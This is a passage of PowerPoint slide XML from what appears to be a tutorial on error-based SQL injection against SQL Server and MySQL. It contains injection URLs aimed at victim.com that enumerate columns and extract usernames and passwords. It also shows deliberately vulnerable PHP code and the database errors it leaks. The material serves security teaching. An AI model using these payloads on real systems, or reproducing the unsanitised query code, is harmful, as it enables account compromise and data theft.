              </a:rPr>
              <a:t> is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Once you have enumerated the column names you can retrieve the values using the converting error technique that you saw earlier:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.victim.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>showproducts.aspx?category</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>bikes’and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t> 1=0/name;--</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Application response:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syntax error converting the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nvarchar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> value </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘Claud Butler Olympus D2’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to a column of data type int.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx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GB" dirty="0"/>
              <a:t>Microsoft SQL Server Errors</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752600" y="990600"/>
            <a:ext cx="8610600" cy="5638800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Information disclosure in error messages can be very useful to an attacker targeting applications using SQL Server databases. If you find this kind of disclosure in an authentication mechanism, try to enumerate the username and password column names using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>HAVING</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>GROUP BY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> techniques already explained:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>http://www.victim.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>logon.aspx?username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>=test’having1’=’1</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.victim.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>logon.aspx?username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>test’GROUP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t> BY User having ‘1’=’1</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>After discovering the column names, you can disclose the credentials of the first account, which may possess administrative privileges:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.victim.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>logon.aspx?username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>=test’ and 1=0/User and 1’=’1</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.victim.com/logon.aspx?username=test ’ and 1=0/Password and 1’=’1</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>You can also discover other accounts adding the discovered usernames in a negative condition to exclude them from the result set:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://www.victim.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>logon.aspx?username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>test’and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t> User not in (‘Admin’) and 1=0/User and 1’=’1</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639762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>MySQL Errors</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1676400" y="762000"/>
            <a:ext cx="8839200" cy="6019800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The following error is usually an indication of a MySQL injection vulnerability:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Warning: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mysql_fetch_array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(): supplied argument is not a valid MySQL result</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>resource in /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/www/victim.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>showproduct.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> on line 8</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>In this example, the attacker injected a single quote in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> parameter and the PHP page sent the SQL statement to the database:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//Connect to the database</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mysql_connect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(“[database]”, “[user]”, “[password]”) or die(“Could not connect:”. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mysql_error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>());</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//Select the database</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mysql_select_db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(“[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>database_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>]”);</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//We retrieve category value from the GET request</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$category =</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$_GET[“category”]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//Create and execute the SQL statement</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$result = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mysql_query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(“SELECT ∗ from products where category=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘$category’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”);</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//Loop on the results</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>while ($row = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mysql_fetch_array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>($result, MYSQL_NUM)) {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(“ID: %s Name: %s”, $row[0], $row[1]);</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>}… ?&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The code shows that the value retrieved from the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> variable is used in the SQL statement without sanitization. If an attacker injects a value with a single quote, the resultant SQL statement will be: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT ∗ FROM products WHERE category=‘attacker’’</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The SQL statement will fail and the PHP will show the warning message. Details of the SQL error are not disclosed, therefore the attacker will need to devote more effort in determining the correct way to exploit the vulnerability. </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639762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>MySQL Errors</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="762000"/>
            <a:ext cx="8991600" cy="6019800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>PHP has a built-in function called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" err="1"/>
              <a:t>mysql_error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> which provides information about the errors returned from the MySQL database during execution of a SQL statement. For example:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$result = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mysql_query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(“SELECT ∗ from products where category=‘$category’”);</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>if (!$result) { //If there is any error</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>die(‘&lt;p&gt;Error:’. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mysql_error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. ‘&lt;/p&gt;’);</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>} else {// Loop on the results</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>When an application running this code catches database errors, the returned HTML document will include the error returned by the database. If an attacker modifies a string parameter by adding a single quote the server will return output similar to the following:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ’’’at line 1</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The preceding output provides information regarding why the SQL query failed. If the injectable parameter is not a string and therefore is not enclosed between single quotes, the resultant output would be:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
